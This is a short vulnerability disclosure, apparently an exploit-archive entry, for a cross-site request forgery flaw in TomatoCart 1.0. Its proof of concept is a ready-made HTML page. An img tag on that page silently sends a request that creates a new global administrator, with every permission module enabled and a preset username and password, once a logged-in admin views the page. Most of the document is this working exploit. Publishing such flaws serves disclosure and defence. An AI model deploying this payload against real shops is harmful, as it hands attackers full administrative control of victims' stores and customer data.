TomatoCart version 1.0 suffers from a cross site request forgery vulnerability.
7c675fcc9c648403240fa66d6a2b6d8841dfb5152a41c459b2f14edba9c432fd
<!------------------------------------------------------------------------
# Software................TomatoCart 1.0
# Vulnerability...........XSRF
# Download................http://www.tomatocart.com/
# Release Date............7/1/2010
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://cross-site-scripting.blogspot.com/
# Email...................john.leitch5@gmail.com
# ------------------------------------------------------------------------
#
# --Description--
#
# A cross-site request forgery vulnerability in TomatoCart 1.0 can be
# exploited to create a new admin.
#
#
--PoC-->
<html>
<body>
<img src="http://localhost/tomatocart/admin/json.php?module=administrators&action=save_administrator&modules=categories%2Cfeature_products_manager%2Cmanufacturers%2Cproduct_variants%2Cproducts%2Cproducts_attributes%2Cproducts_expected%2Cquantity_discount_groups%2Creviews%2Csearch_terms%2Cspecials%2Cconfiguration%2Cwizard_installation%2Chomepage_meta_info%2Carticles%2Carticles_categories%2Cfaqs%2Cslide_images%2Crecorvered_cart%2Ccoupons%2Ccredits_memo%2Ccustomers%2Ccustomers_groups%2Cemail%2Cgift_certificates%2Cinvoices%2Corders%2Corders_returns%2Cpurchased_downloadables%2Ccountries%2Ccredit_cards%2Ccurrencies%2Cimage_groups%2Cinformation%2Clanguages%2Corders_status%2Ctax_classes%2Cunit_classes%2Cweight_classes%2Czone_groups%2Cmodules_geoip%2Cmodules_order_total%2Cmodules_payment%2Cmodules_shipping%2Cservices%2Creports_customers%2Creports_products%2Creports_web%2Clogo_upload%2Ctemplates%2Ctemplates_modules%2Ctemplates_modules_layout%2Cadministrators%2Cadministrators_log%2Cbackup%2Cbanner_manager%2Ccache%2Cdashboard%2Cemail_templates%2Cfile_manager%2Cgoogle_sitemap%2Cimages%2Cimport_export%2Cnewsletters%2Cserver_info%2Cwhos_online&access_globaladmin=on&user_name=new_admin&user_password=Password1&email_address=test%40test.com" />
</body>
</html>